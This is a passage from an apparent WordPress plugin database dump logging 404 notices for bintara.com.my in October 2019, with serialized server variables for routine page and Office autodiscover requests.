ebmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XayvHT3@-6BuXzuYs05ZcAAAAoE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571598109.848\";s:12:\"REQUEST_TIME\";s:10:\"1571598109\";}}','notice','2019-10-20 19:01:52','2019-10-20 19:01:50',34207832,36020096,'https://bintara.com.my/ptz-pro/',1,0,'40.77.167.3'),(28528,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:132:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.64\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"202.94.175.6\";s:11:\"REMOTE_PORT\";s:5:\"37141\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XayxDz3@-6BuXzuYs05aRQAAAo8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571598607.623\";s:12:\"REQUEST_TIME\";s:10:\"1571598607\";}}','notice','2019-10-20 19:10:09','2019-10-20 19:10:07',34917384,36721008,'https://bintara.com.my/?page_id=18',1,0,'202.94.175.6'),(28529,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"201.81.220.151\";s:11:\"REMOTE_PORT\";s:5:\"58615\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XazmZz3@-6BuXzuYs05ozwAAAoA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571612263.683\";s:12:\"REQUEST_TIME\";s:10:\"1571612263\";}}','notice','2019-10-20 22:57:45','2019-10-20 22:57:44',34922720,36727704,'https://bintara.com.my/?page_id=18',1,0,'201.81.220.151'),(28530,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/7.0.185.1002 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"57427\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XazvcOChWqi2NVtnqltt2AAAAgk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571614576.5485\";s:12:\"REQUEST_TIME\";s:10:\"1571614576\";}}','notice','2019-10-20 23:36:19','2019-10-20 23:36:16',35312464,37112632,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(28531,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12026; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"42DCC523-6497-4151-AD21-978A3DD90471\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.12026\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaz0qCDLdtmxqeKZJu9kKQAAAkg\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"124.13.207.181\";s:11:\"REMOTE_PORT\";s:5:\"49914\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaz0qCDLdtmxqeKZJu9kKQAAAkg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571615912.6857\";s:12:\"REQUEST_TIME\";s:10:\"1571615912\";}}','notice','2019-10-20 23:58:34','2019-10-20 23:58:33',35279864,37086320,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'124.13.207.181'),(28532,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.5155.400 QQBrowser/9.7.13231.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.71.213.82\";s:11:\"REMOTE_PORT\";s:5:\"51998\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaz05CDLdtmxqeKZJu9kSwAAAlE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571615972.3892\";s:12:\"REQUEST_TIME\";s:10:\"1571615972\";}}','notice','2019-10-20 23:59:34','2019-10-20 23:59:32',34922104,36731304,'https://bintara.com.my/?page_id=18',1,0,'167.71.213.82'),(28533,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"80F68909-3FA5-41FB-A1E5-58768EEB89A0\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaz6xj3@-6BuXzuYs05w8QAAAo4\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"124.13.207.181\";s:11:\"REMOTE_PORT\";s:5:\"54537\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaz6xj3@-6BuXzuYs05w8QAAAo4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571617478.8313\";s:12:\"REQUEST_TIME\";s:10:\"1571617478\";}}','notice','2019-10-21 00:24:41','2019-10-21 00:24:39',35668056,37466120,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'124.13.207.181'),(28534,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"319\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"2EAB5088-BE10-4CF8-93F5-CF01D59AE66D\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaz-9OChWqi2NVtnqltyqgAAAgo\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"124.13.207.181\";s:11:\"REMOTE_PORT\";s:5:\"60644\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaz-9OChWqi2NVtnqltyqgAAAgo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571618804.4153\";s:12:\"REQUEST_TIME\";s:10:\"1571618804\";}}','notice','2019-10-21 00:46:47','2019-10-21 00:46:44',35667496,37466256,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'124.13.207.181'),(28535,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"7CB095D1-7BBB-441E-BE95-CD7AF590C3DD\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa0AyD3@-6BuXzuYs052pQAAApg\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"124.13.207.181\";s:11:\"REMOTE_PORT\";s:5:\"63137\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa0AyD3@-6BuXzuYs052pQAAApg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571619016.4552\";s:12:\"REQUEST_TIME\";s:10:\"1571619016\";}}','notice','2019-10-21 00:50:18','2019-10-21 00:50:16',35276944,37079376,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'124.13.207.181'),(28536,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:61:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"643-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"br, gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{AEAF329D-38DC-4376-AB33-33329ECB887C}\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.30.0.191013 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; 